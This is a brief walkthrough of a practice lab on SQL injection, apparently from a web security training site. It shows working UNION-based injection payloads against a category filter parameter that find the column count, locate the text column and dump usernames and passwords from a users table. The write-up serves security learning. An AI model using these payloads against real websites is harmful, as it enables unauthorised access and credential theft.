Difficulty : Practitioner
🎯 Goal
The database contains a new table called users, with columns called username and password.
To solve the lab, perform a SQL injection UNION attack that retrieves all usernames and passwords, and use the information to log in as the administrator user.
✅ Solution
First we need to know how many columns are returned by the query:
1
2
3
<website>/filter?category=Pets' UNION SELECT NULL-- # error!
<website>/filter?category=Pets' UNION SELECT NULL,NULL-- # works
<website>/filter?category=Pets' UNION SELECT NULL,NULL,NULL-- # error!
We now know there are 2 columns. Time to test where is the string data:
1
2
<website>/filter?category=Pets' UNION SELECT 'abc',NULL-- # error!
<website>/filter?category=Pets' UNION SELECT NULL,'abc'-- # works
Ok the second column is a string one. To extract both users and passwords columns we will have to concatenate them into just one columns using the special operator <string> || <string> (can vary according to the DBMS).
Let’s try on the full request now:
1
<website>/filter?category=Gifts' UNION SELECT NULL,username || '~' || password FROM users-- # administrator~password